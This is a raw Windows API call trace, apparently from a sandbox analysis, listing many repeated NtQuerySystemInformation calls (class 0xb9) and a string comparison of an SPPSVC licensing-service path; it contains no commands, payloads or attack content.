NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febe0, Length=0x38, ResultLength=0x0) [0228.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febe0, Length=0x38, ResultLength=0x0) [0228.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea60, Length=0x20, ResultLength=0x0) [0228.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe9f0, Length=0x20, ResultLength=0x0) [0228.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe9f0, Length=0x20, ResultLength=0x0) [0228.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef20, Length=0x50, ResultLength=0x0) [0228.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef20, Length=0x50, ResultLength=0x0) [0228.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef20, Length=0x50, ResultLength=0x0) [0228.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee10, Length=0x50, ResultLength=0x0) [0228.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee10, Length=0x50, ResultLength=0x0) [0228.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee10, Length=0x50, ResultLength=0x0) [0228.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee10, Length=0x50, ResultLength=0x0) [0228.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed40, Length=0x38, ResultLength=0x0) [0228.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb70, Length=0x28, ResultLength=0x0) [0228.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb70, Length=0x28, ResultLength=0x0) [0228.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb70, Length=0x28, ResultLength=0x0) [0228.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febe0, Length=0x28, ResultLength=0x0) [0228.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed40, Length=0x38, ResultLength=0x0) [0228.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec60, Length=0x28, ResultLength=0x0) [0228.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec60, Length=0x28, ResultLength=0x0) [0228.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed40, Length=0x38, ResultLength=0x0) [0228.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febc0, Length=0x20, ResultLength=0x0) [0228.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb40, Length=0x20, ResultLength=0x0) [0228.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb40, Length=0x20, ResultLength=0x0) [0228.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb40, Length=0x20, ResultLength=0x0) [0228.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed40, Length=0x38, ResultLength=0x0) [0228.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febc0, Length=0x20, ResultLength=0x0) [0228.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb50, Length=0x20, ResultLength=0x0) [0228.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb50, Length=0x20, ResultLength=0x0) [0228.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef20, Length=0x50, ResultLength=0x0) [0228.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef20, Length=0x50, ResultLength=0x0) [0228.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef20, Length=0x50, ResultLength=0x0) [0228.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee10, Length=0x50, ResultLength=0x0) [0228.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee10, Length=0x50, ResultLength=0x0) [0228.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee10, Length=0x50, ResultLength=0x0) [0228.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee10, Length=0x50, ResultLength=0x0) [0228.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed40, Length=0x38, ResultLength=0x0) [0228.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb70, Length=0x28, ResultLength=0x0) [0228.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb70, Length=0x28, ResultLength=0x0) [0228.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb70, Length=0x28, ResultLength=0x0) [0228.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febe0, Length=0x28, ResultLength=0x0) [0228.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed40, Length=0x38, ResultLength=0x0) [0228.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec60, Length=0x28, ResultLength=0x0) [0228.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec60, Length=0x28, ResultLength=0x0) [0228.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed40, Length=0x38, ResultLength=0x0) [0228.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febc0, Length=0x20, ResultLength=0x0) [0228.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb40, Length=0x20, ResultLength=0x0) [0228.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb40, Length=0x20, ResultLength=0x0) [0228.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb40, Length=0x20, ResultLength=0x0) [0228.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed40, Length=0x38, ResultLength=0x0) [0228.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febc0, Length=0x20, ResultLength=0x0) [0228.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb50, Length=0x20, ResultLength=0x0) [0228.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb50, Length=0x20, ResultLength=0x0) [0228.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fefd0, Length=0x50, ResultLength=0x0) [0228.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef50, Length=0x28, ResultLength=0x0) [0228.361] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0228.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fefd0, Length=0x50, ResultLength=0x0) [0228.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fefd0, Length=0x50, ResultLength=0x0) [0228.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fefd0, Length=0x50, ResultLength=0x0) [0228.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef00, Length=0x38, ResultLength=0x0) [0228.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed30, Length=0x28, ResultLength=0x0) [0228.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed30, Length=0x28, ResultLength=0x0) [0228.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed30, Length=0x28, ResultLength=0x0) [0228.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feda0, Length=0x28, ResultLength=0x0) [0228.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef00, Length=0x38, ResultLength=0x0) [0228.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee20, Length=0x28, ResultLength=0x0) [0228.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee20, Length=0x28, ResultLength=0x0) [0228.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef00, Length=0x38, ResultLength=0x0) [0228.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed80, Length=0x20, ResultLength=0x0) [0228.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed00, Length=0x20, ResultLength=0x0) [0228.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed00, Length=0x20, ResultLength=0x0) [0228.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed00, Length=0x20, ResultLength=0x0) [0228.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef00, Length=0x38, ResultLength=0x0) [0228.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed80, Length=0x20, ResultLength=0x0) [0228.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed10, Length=0x20, ResultLength=0x0) [0228.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed10, Length=0x20, ResultLength=0x0) [0228.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fefd0, Length=0x50, ResultLength=0x0) [0228.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef50, Length=0x28, ResultLength=0x0) [0228.374] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0228.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fefd0, Length=0x50, ResultLength=0x0) [0228.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fefd0, Length=0x50, ResultLength=0x0) [0228.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fefd0, Length=0x50, ResultLength=0x0) [0228.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef00, Length=0x38, ResultLength=0x0) [0228.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed30, Length=0x28, ResultLength=0x0) [0228.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed30, Length=0x28, ResultLength=0x0) [0228.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed30, Length=0x28, ResultLength=0x0) [0228.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feda0, Length=0x28, ResultLength=0x0) [0228.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef00, Length=0x38, ResultLength=0x0) [0228.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee20, Length=0x28, ResultLength=0x0) [0228.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) 